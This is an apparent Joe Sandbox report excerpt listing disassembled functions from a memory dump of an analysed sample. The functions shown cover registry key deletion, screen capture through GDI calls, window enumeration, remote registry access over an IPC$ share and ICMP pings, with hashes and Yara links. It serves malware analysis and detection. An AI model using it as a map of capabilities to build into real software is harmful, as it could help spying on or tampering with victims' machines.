RegOpenKeyExW.ADVAPI32 ref: 0029B772
RegDeleteValueW.ADVAPI32 ref: 0029B80A
RegCloseKey.ADVAPI32(?), ref: 0029B87E
RegCloseKey.ADVAPI32(?), ref: 0029B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0029B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0029B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0029B922
FreeLibrary.KERNEL32(00000000), ref: 0029B983
RegCloseKey.ADVAPI32(00000000), ref: 0029B994

Strings

advapi32.dll, xrefs: 0029B8ED
RegDeleteKeyExW, xrefs: 0029B8FE

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 79a26237770e3b9a511611c69ad78d5ba99e02434bc5bafd9e005e2447d196c5
Instruction ID: 81d5ce16dd4192800b818cb28e4171a7e8df9904c530d323a4731867a97efea1
Opcode Fuzzy Hash: 79a26237770e3b9a511611c69ad78d5ba99e02434bc5bafd9e005e2447d196c5
Instruction Fuzzy Hash: 0DC1BF34224202AFDB11DF14D594F6ABBE5BF84308F14859CF59A4B2A2CB71EC95CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0029255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002925D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002925E8
CreateCompatibleDC.GDI32(?), ref: 002925F4
SelectObject.GDI32(00000000,?), ref: 00292601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0029266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002926AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002926D0
SelectObject.GDI32(?,?), ref: 002926D8
DeleteObject.GDI32(?), ref: 002926E1
DeleteDC.GDI32(?), ref: 002926E8
ReleaseDC.USER32(00000000,?), ref: 002926F3

Strings

(, xrefs: 0029268D

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5d3e5f36a5c3c32a19b916e6a346f22118075a7a19bc4a0e5eda02a97107b6c9
Instruction ID: 449b65879a59eab2da307b64067864e3f6a40ba1aa2e941b402a44e22032466c
Opcode Fuzzy Hash: 5d3e5f36a5c3c32a19b916e6a346f22118075a7a19bc4a0e5eda02a97107b6c9
Instruction Fuzzy Hash: B961D475E10219EFCF05CFA4D984AAEBBF9FF48310F208529E959A7250D770A951CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0027365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0027369C
_wcslen.LIBCMT ref: 002736A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00273797
GetClassNameW.USER32(?,?,00000400), ref: 0027380C
GetDlgCtrlID.USER32 ref: 0027385D
GetWindowRect.USER32(?,?), ref: 00273882
GetParent.USER32(?), ref: 002738A0
ScreenToClient.USER32(00000000), ref: 002738A7
GetClassNameW.USER32(?,?,00000100), ref: 00273921
GetWindowTextW.USER32 ref: 0027395D

Strings

%s%u, xrefs: 00273734

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 9c1ddf7b4fd22764f561b68804577d8e642c9925c636fc95728016f65e2fee74
Instruction ID: dcf691f487f3b65d653ebb0e39a3da2cdcf986de4ecc96a978d3ad1e753eca92
Opcode Fuzzy Hash: 9c1ddf7b4fd22764f561b68804577d8e642c9925c636fc95728016f65e2fee74
Instruction Fuzzy Hash: E591BC71224607EFD719DF24C885BAAF7A8FF44310F108629FA9DC2190DB30EA65DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00274954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00274994
GetWindowTextW.USER32 ref: 002749DA
_wcslen.LIBCMT ref: 002749EB
CharUpperBuffW.USER32(?,00000000), ref: 002749F7
_wcsstr.LIBVCRUNTIME ref: 00274A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00274A64
GetWindowTextW.USER32 ref: 00274A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00274AE6
GetClassNameW.USER32(?,?,00000400), ref: 00274B20
GetWindowRect.USER32(?,?), ref: 00274B8B

Strings

ThumbnailClass, xrefs: 00274A6F, 00274AF1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: a0f271917c07a1e5c8e93f69cb946fc1d6b47d42bac683d4c86e31cf3b4c2413
Instruction ID: 11e0d711786fda7d9663648fd65e6b31e6a5b9da6773350422ef88b39255ddd6
Opcode Fuzzy Hash: a0f271917c07a1e5c8e93f69cb946fc1d6b47d42bac683d4c86e31cf3b4c2413
Instruction Fuzzy Hash: 2691D1714242069FDB05EF14C885FAAB7E8FF84714F04C46AFD899A096DB30ED65CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00229BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00229BB2

PostMessageW.USER32 ref: 002A8D5A
GetFocus.USER32 ref: 002A8D6A
GetDlgCtrlID.USER32 ref: 002A8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 002A8E1D
GetMenuItemInfoW.USER32 ref: 002A8ECF
GetMenuItemCount.USER32(?), ref: 002A8EEC
GetMenuItemID.USER32(?,00000000), ref: 002A8EFC
GetMenuItemInfoW.USER32 ref: 002A8F2E
GetMenuItemInfoW.USER32 ref: 002A8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002A8FA1

Strings

0, xrefs: 002A8E9F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 527e53b7474657c05bfb1d939ce9c08c1b32dc84b230e7ebcb82a7d1a8da2b17
Instruction ID: 1cd57224e16c31c6acdca1b7961ff8c17b89add1800989e6b3bb20c83b3bff07
Opcode Fuzzy Hash: 527e53b7474657c05bfb1d939ce9c08c1b32dc84b230e7ebcb82a7d1a8da2b17
Instruction Fuzzy Hash: 7B8192715143029FDB10CF24D984A6BBBE9FB8A754F140929F985D7291DF70D920CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0029CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0029CC64
RegOpenKeyExW.ADVAPI32 ref: 0029CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0029CD48

Part of subcall function 0029CC34: RegCloseKey.ADVAPI32(?), ref: 0029CCAA
Part of subcall function 0029CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 0029CCBD
Part of subcall function 0029CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 0029CCCF
Part of subcall function 0029CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0029CD05
Part of subcall function 0029CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0029CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0029CCF3

Strings

advapi32.dll, xrefs: 0029CCB8
RegDeleteKeyExW, xrefs: 0029CCC9

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 4fd555ce7e9eafbf2c7a93478ab2ec87e7411b5c2ba5163fb8c9dfe4fab4f84c
Instruction ID: 3c0574f1cf9cded1bfff12894f067eff21a9d7df2a5251338d29bd26e93ae871
Opcode Fuzzy Hash: 4fd555ce7e9eafbf2c7a93478ab2ec87e7411b5c2ba5163fb8c9dfe4fab4f84c
Instruction Fuzzy Hash: 32316E71A11129BBDB208F54DC8CEFFBB7CEF46750F200165E909E2240DA749E45AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0027E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0027E6B4

Part of subcall function 0022E551: timeGetTime.WINMM ref: 0022E555

Sleep.KERNEL32(0000000A), ref: 0027E6E1
EnumThreadWindows.USER32 ref: 0027E705
FindWindowExW.USER32 ref: 0027E727
SetActiveWindow.USER32 ref: 0027E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0027E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0027E773
Sleep.KERNEL32(000000FA), ref: 0027E77E
IsWindow.USER32 ref: 0027E78A
EndDialog.USER32 ref: 0027E79B

Strings

BUTTON, xrefs: 0027E719

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 86540c119219bb212740a0133a43f280bac35be7b5a1361cead5caac465b5e20
Instruction ID: c0c52ca9ee503e2595f80a1d37c42a06ae513f437e6904e12cb03eacc4618e40
Opcode Fuzzy Hash: 86540c119219bb212740a0133a43f280bac35be7b5a1361cead5caac465b5e20
Instruction Fuzzy Hash: 7021D1B0660245EFEF009F24FCCDA257B6DF75A748B218465F90E861A1DFB1AC248A34

Uniqueness

Uniqueness Score: -1.00%

Function 0027E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0027EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0027EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0027EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0027EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0027EAA7

Strings

alias PlayMe, xrefs: 0027EA36
open , xrefs: 0027EA0C
play PlayMe wait, xrefs: 0027EA91
play PlayMe, xrefs: 0027EAA2
status PlayMe mode, xrefs: 0027EA58
close PlayMe, xrefs: 0027EA6E, 0027EA9B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 9f1b5a7f1f03d02dd4c1535d4263f585cc00eff70e780e532a6206c5da007f28
Instruction ID: d6e16fbec0d9599083504087e5772762916dfb6f6746c9982dc9d538bc17d2ac
Opcode Fuzzy Hash: 9f1b5a7f1f03d02dd4c1535d4263f585cc00eff70e780e532a6206c5da007f28
Instruction Fuzzy Hash: D311773167025979DB20E7A5DC5EDFF6BBCEBD6B00F000466B415A21D1DE701DA5C9B0

Uniqueness

Uniqueness Score: -1.00%

Function 00228BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00228F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00228FC5

DestroyWindow.USER32 ref: 00228C81
KillTimer.USER32 ref: 00228D1B
DestroyAcceleratorTable.USER32 ref: 00266973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00228BBA,00000000,?), ref: 002669A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00228BBA,00000000,?), ref: 002669B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00228BBA,00000000), ref: 002669D4
DeleteObject.GDI32(00000000), ref: 002669E6

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: fe01b9f0cadbeed4ce92558e606e1c23a4133798bcf6c5dcb7a376a3875b7e95
Instruction ID: 90eda7af4b3af96fe22a91ad7a20867d7a2bddae8b0170e20e695a7c9281ff81
Opcode Fuzzy Hash: fe01b9f0cadbeed4ce92558e606e1c23a4133798bcf6c5dcb7a376a3875b7e95
Instruction Fuzzy Hash: 1B617F31522661EFDB299F54FA4CB29B7F1FB41312F144529E0429A560CB75EDB0CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00229838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00229944: GetWindowLongW.USER32(?,000000EB), ref: 00229952

GetSysColor.USER32 ref: 00229862

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a23268133f27a1e2e0aac2ab4c1245cea4d073043dea143514aaac04e57d9909
Instruction ID: 1a7961e444507467cbd76f4cc6b4558949f14fdeba1eb1152a4e7f53fb727a5e
Opcode Fuzzy Hash: a23268133f27a1e2e0aac2ab4c1245cea4d073043dea143514aaac04e57d9909
Instruction Fuzzy Hash: 0E41F531510650AFDB205F78BC88BB93BA5EB17330F284655F9A6872E1CB319CE2DB11

Uniqueness

Uniqueness Score: -1.00%

Function 002796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0025F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00279717
LoadStringW.USER32(00000000,?,0025F7F8,00000001), ref: 00279720

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0025F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00279742
LoadStringW.USER32(00000000,?,0025F7F8,00000001), ref: 00279745
MessageBoxW.USER32 ref: 00279866

Strings

Line %d (File "%s"):, xrefs: 0027978F
Error: , xrefs: 0027981D
Line %d:, xrefs: 002797A0
%s (%d) : ==> %s: %s %s, xrefs: 0027984A
^ ERROR, xrefs: 002797FB

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: f9cbabb092f1c7ee49cd23ba8b68f36ba8f0975222fa8eeebee9e275d44a95ed
Instruction ID: 57985ab4af3e3b21ffe2f0b915dc736f6de9357e06415407fa6934a1bd768651
Opcode Fuzzy Hash: f9cbabb092f1c7ee49cd23ba8b68f36ba8f0975222fa8eeebee9e275d44a95ed
Instruction Fuzzy Hash: 4C414172810219ABDB14EBE0DD56DEEB3B9AF25340F104065F60572092EB756FE8CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002706DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002707A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002707BE
RegOpenKeyExW.ADVAPI32 ref: 002707DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00270804
CLSIDFromString.OLE32(?,000001FE), ref: 0027082C
RegCloseKey.ADVAPI32(?), ref: 00270837
RegCloseKey.ADVAPI32(?), ref: 0027083C

Strings

\CLSID, xrefs: 00270724
\IPC$, xrefs: 00270784
SOFTWARE\Classes\, xrefs: 0027070E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 6e5ed620a0281cbc3f83e64e8de277c39e75c18433626e7f70a89e2ee4ab9a94
Instruction ID: a9fc7106480c6c2ebc5a79808b1163c4ad569c989b49c44e45f7b1ff1245cb73
Opcode Fuzzy Hash: 6e5ed620a0281cbc3f83e64e8de277c39e75c18433626e7f70a89e2ee4ab9a94
Instruction Fuzzy Hash: 18411A71C20229EBDF15EF94DC958EDB7B8BF14350B144166E905A3160EB705E98CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002A541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002A5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A5515
CharNextW.USER32(00000158), ref: 002A5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002A5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002A559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002A55AC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: cb1194069ff1ce5677b8786dd5fcaffa54bc7907f063ee026bf3f7427ca50ecb
Instruction ID: 1459b404b88d5c3c8dd8c0561917ff488526bb09532fa88e943a80ba97357adf
Opcode Fuzzy Hash: cb1194069ff1ce5677b8786dd5fcaffa54bc7907f063ee026bf3f7427ca50ecb
Instruction Fuzzy Hash: 8F616D3192462AEBDF10DF54DC849FF7BB9FB0B720F104145F525AA290DB748AA0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0029055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002905BC
inet_addr.WSOCK32(?), ref: 0029061C
gethostbyname.WSOCK32(?), ref: 00290628
IcmpCreateFile.IPHLPAPI ref: 00290636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002906C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002906E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002907B9
WSACleanup.WSOCK32 ref: 002907BF

Strings

Ping, xrefs: 00290676

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
